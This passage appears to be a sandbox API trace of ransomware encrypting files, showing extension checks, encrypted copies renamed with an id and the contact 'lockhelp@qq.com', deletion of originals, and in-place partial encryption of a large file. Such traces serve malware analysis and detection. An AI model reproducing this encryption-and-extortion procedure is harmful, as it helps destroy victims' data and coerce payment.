(lpString=".zip") returned 4 [0197.392] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.392] lstrlenW (lpString=".rar") returned 4 [0197.392] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.392] lstrlenW (lpString=".bz2") returned 4 [0197.392] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.392] lstrlenW (lpString=".7z") returned 3 [0197.392] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.392] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.392] lstrlenW (lpString=".dbf") returned 4 [0197.392] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.392] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.392] lstrlenW (lpString=".1cd") returned 4 [0197.392] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.392] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0197.392] lstrlenW (lpString=".jpg") returned 4 [0197.392] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.393] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.393] lstrlenW (lpString="Rotate1.ico") returned 11 [0197.393] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.394] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=894) returned 1 [0197.394] CloseHandle (hObject=0x40c) returned 1 [0197.394] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 0x80 [0197.394] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.394] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.394] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.394] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.395] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.395] GetLastError () returned 0x0 [0197.395] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.399] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.400] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.400] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.400] SetEndOfFile (hFile=0x3dc) returned 1 [0197.400] CloseHandle (hObject=0x3dc) returned 1 [0197.401] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.401] SetEndOfFile (hFile=0x40c) returned 1 [0197.402] CloseHandle (hObject=0x40c) returned 1 [0197.402] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.402] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 1 [0197.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.402] lstrlenW (lpString=".doc") returned 4 [0197.402] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.402] lstrlenW (lpString=".docx") returned 5 [0197.403] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0197.403] lstrlenW (lpString=".pdf") returned 4 [0197.403] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.403] lstrlenW (lpString=".xls") returned 4 [0197.403] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.403] lstrlenW (lpString=".xlsx") returned 5 [0197.403] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0197.403] lstrlenW (lpString=".ppt") returned 4 [0197.403] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.403] lstrlenW (lpString=".zip") returned 4 [0197.403] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.403] lstrlenW (lpString=".rar") returned 4 [0197.403] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.403] lstrlenW (lpString=".bz2") returned 4 [0197.403] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.403] lstrlenW (lpString=".7z") returned 3 [0197.403] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.403] lstrlenW (lpString=".dbf") returned 4 [0197.404] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.404] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.404] lstrlenW (lpString=".1cd") returned 4 [0197.404] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.404] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.404] lstrlenW (lpString=".jpg") returned 4 [0197.404] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.404] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.404] lstrlenW (lpString=".doc") returned 4 [0197.404] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.404] lstrlenW (lpString=".docx") returned 5 [0197.404] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0197.404] lstrlenW (lpString=".pdf") returned 4 [0197.404] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString=".xls") returned 4 [0197.404] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString=".xlsx") returned 5 [0197.404] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0197.404] lstrlenW (lpString=".ppt") returned 4 [0197.404] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.404] lstrlenW (lpString=".zip") returned 4 [0197.404] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString=".rar") returned 4 [0197.404] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.404] lstrlenW (lpString=".bz2") returned 4 [0197.404] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.405] lstrlenW (lpString=".7z") returned 3 [0197.405] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.405] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.405] lstrlenW (lpString=".dbf") returned 4 [0197.405] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.405] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.405] lstrlenW (lpString=".1cd") returned 4 [0197.405] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.405] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0197.405] lstrlenW (lpString=".jpg") returned 4 [0197.405] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.405] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.405] lstrlenW (lpString="Rotate2.ico") returned 11 [0197.405] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.405] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=894) returned 1 [0197.405] CloseHandle (hObject=0x40c) returned 1 [0197.406] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 0x80 [0197.406] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.406] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.406] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.406] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.406] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.406] GetLastError () returned 0x0 [0197.406] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.716] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.717] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.717] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.717] SetEndOfFile (hFile=0x3dc) returned 1 [0197.877] CloseHandle (hObject=0x3dc) returned 1 [0197.878] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.878] SetEndOfFile (hFile=0x40c) returned 1 [0197.879] CloseHandle (hObject=0x40c) returned 1 [0197.879] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.879] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 1 [0197.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.879] lstrlenW (lpString=".doc") returned 4 [0197.880] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.880] lstrlenW (lpString=".docx") returned 5 [0197.880] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0197.880] lstrlenW (lpString=".pdf") returned 4 [0197.880] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.880] lstrlenW (lpString=".xls") returned 4 [0197.880] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.880] lstrlenW (lpString=".xlsx") returned 5 [0197.880] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0197.880] lstrlenW (lpString=".ppt") returned 4 [0197.880] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.880] lstrlenW (lpString=".zip") returned 4 [0197.880] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.880] lstrlenW (lpString=".rar") returned 4 [0197.880] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.880] lstrlenW (lpString=".bz2") returned 4 [0197.880] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.880] lstrlenW (lpString=".7z") returned 3 [0197.880] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.880] lstrlenW (lpString=".dbf") returned 4 [0197.880] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.880] lstrlenW (lpString=".1cd") returned 4 [0197.880] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.880] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.880] lstrlenW (lpString=".jpg") returned 4 [0197.880] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.881] lstrlenW (lpString=".doc") returned 4 [0197.881] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.881] lstrlenW (lpString=".docx") returned 5 [0197.881] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0197.881] lstrlenW (lpString=".pdf") returned 4 [0197.881] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString=".xls") returned 4 [0197.881] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString=".xlsx") returned 5 [0197.881] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0197.881] lstrlenW (lpString=".ppt") returned 4 [0197.881] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.881] lstrlenW (lpString=".zip") returned 4 [0197.881] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString=".rar") returned 4 [0197.881] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.881] lstrlenW (lpString=".bz2") returned 4 [0197.881] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.881] lstrlenW (lpString=".7z") returned 3 [0197.881] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.881] lstrlenW (lpString=".dbf") returned 4 [0197.881] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.881] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.881] lstrlenW (lpString=".1cd") returned 4 [0197.881] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0197.882] lstrlenW (lpString=".jpg") returned 4 [0197.882] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.882] lstrcmpiW (lpString1=".mzz", lpString2=".jack") returned 1 [0197.882] lstrlenW (lpString="netfx_Core.mzz") returned 14 [0197.882] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.882] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=181483595) returned 1 [0197.882] CloseHandle (hObject=0x40c) returned 1 [0197.882] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz")) returned 0x80 [0197.882] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.882] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0197.883] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.883] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc64 | out: lpNewFilePointer=0x0) returned 1 [0197.883] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.883] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3ce8058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.913] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.913] ReadFile (in: hFile=0x40c, lpBuffer=0x3d28058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d28058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.039] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2a1fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.039] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc24 | out: lpNewFilePointer=0x0) returned 1 [0198.039] ReadFile (in: hFile=0x40c, lpBuffer=0x3d68058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a1fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d68058*, lpNumberOfBytesRead=0x2a1fc30*=0x40000, lpOverlapped=0x0) returned 1 [0198.058] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.058] WriteFile (in: hFile=0x40c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2a1fca8, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fca8*=0xc0108, lpOverlapped=0x0) returned 1 [0198.071] SetEndOfFile (hFile=0x40c) returned 1 [0198.072] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4770048 [0198.433] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.433] WriteFile (in: hFile=0x40c, lpBuffer=0x4770048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4770048*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.441] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.441] WriteFile (in: hFile=0x40c, lpBuffer=0x4770048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4770048*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.442] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.442] WriteFile (in: hFile=0x40c, lpBuffer=0x4770048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a1fc80, lpOverlapped=0x0 | out: lpBuffer=0x4770048*, lpNumberOfBytesWritten=0x2a1fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.444] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4770048 | out: hHeap=0x5e0000) returned 1 [0198.445] CloseHandle (hObject=0x40c) returned 1 [0201.517] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0201.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.517] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.517] lstrlenW (lpString=".doc") returned 4 [0201.517] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0201.517] lstrlenW (lpString=".docx") returned 5 [0201.517] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0201.517] lstrlenW (lpString=".pdf") returned 4 [0201.517] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0201.517] lstrlenW (lpString=".xls") returned 4 [0201.517] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0201.517] lstrlenW (lpString=".xlsx") returned 5 [0201.517] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0201.517] lstrlenW (lpString=".ppt") returned 4 [0201.517] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString=".zip") returned 4 [0201.518] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0201.518] lstrlenW (lpString=".rar") returned 4 [0201.518] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0201.518] lstrlenW (lpString=".bz2") returned 4 [0201.518] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0201.518] lstrlenW (lpString=".7z") returned 3 [0201.518] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString=".dbf") returned 4 [0201.518] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString=".1cd") returned 4 [0201.518] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString=".jpg") returned 4 [0201.518] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.518] lstrlenW (lpString=".doc") returned 4 [0201.518] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0201.518] lstrlenW (lpString=".docx") returned 5 [0201.518] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0201.518] lstrlenW (lpString=".pdf") returned 4 [0201.518] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0201.519] lstrlenW (lpString=".xls") returned 4 [0201.519] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0201.519] lstrlenW (lpString=".xlsx") returned 5 [0201.519] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0201.519] lstrlenW (lpString=".ppt") returned 4 [0201.519] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0201.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.519] lstrlenW (lpString=".zip") returned 4 [0201.519] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0201.519] lstrlenW (lpString=".rar") returned 4 [0201.519] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0201.519] lstrlenW (lpString=".bz2") returned 4 [0201.519] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0201.519] lstrlenW (lpString=".7z") returned 3 [0201.519] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0201.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0201.519] lstrlenW (lpString=".dbf") returned 4 [0201.519] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0201.519] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 